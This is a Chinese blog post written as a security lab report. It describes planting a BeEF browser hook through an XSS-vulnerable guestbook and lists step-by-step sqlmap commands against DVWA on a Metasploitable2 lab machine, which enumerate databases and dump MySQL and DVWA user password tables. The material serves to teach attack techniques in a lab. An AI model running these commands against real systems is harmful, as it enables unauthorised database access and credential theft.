XSS与SQL注入

一、 XSS跨站脚本注入实验
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
在这里插入图片描述

网站搭建好后就开始用AWVS扫描该网页是否存在XSS漏洞
1、利用AWVS扫描留言簿网站发现其存在XSS漏洞,
在这里插入图片描述

2、 Kali使用beef生成恶意代码
在这里使用beef工具时出现了错误,不能使用默认的账号和密码,文件中添加一个账号即可

1

将它写到留言板上,当服务器去访问留言簿时,网站会自动解析这段恶意代码,与kali上的beef连接

在这里插入图片描述

在这里插入图片描述

二、SQL注入实验
在这里插入图片描述
在这里插入图片描述

实验环境:
实验设备:一台kali虚拟机, 一台Metasploitable2虚拟机(均采用桥接方式)
在kali中访问Metasploitable2的DVWA,将安全等级跳到low,不然不会有注入漏洞。
调试好之后,进行注入,第一次输入 1,第二次输入 1’ 。两次显回不一样,存在注入漏洞。
在这里插入图片描述

在输入1的页面按F12得出cookie
在这里插入图片描述

枚举当前使用的数据库名称和用户名
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie='security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472 -b --current-db --current-user
在这里插入图片描述

枚举数据库用户名和密码
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D dvwa --string=“Surname” --users --password

在这里插入图片描述
枚举数据库
使用下列命令

sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ --dbs
在这里插入图片描述

枚举数据库和指定数据库的数据表
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D mysql -T user --columns
在这里插入图片描述

获取指定数据库和表中所有列的信息
访问mysql数据库user表单
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D mysql -T user -C user,password --dump
在这里插入图片描述

访问dvwa数据库users表单,即我们的登陆账号信息
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D dvwa -T users -C user,password --dump

在这里插入图片描述
保存在本地的文件,用root权限打开便可以看到
在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值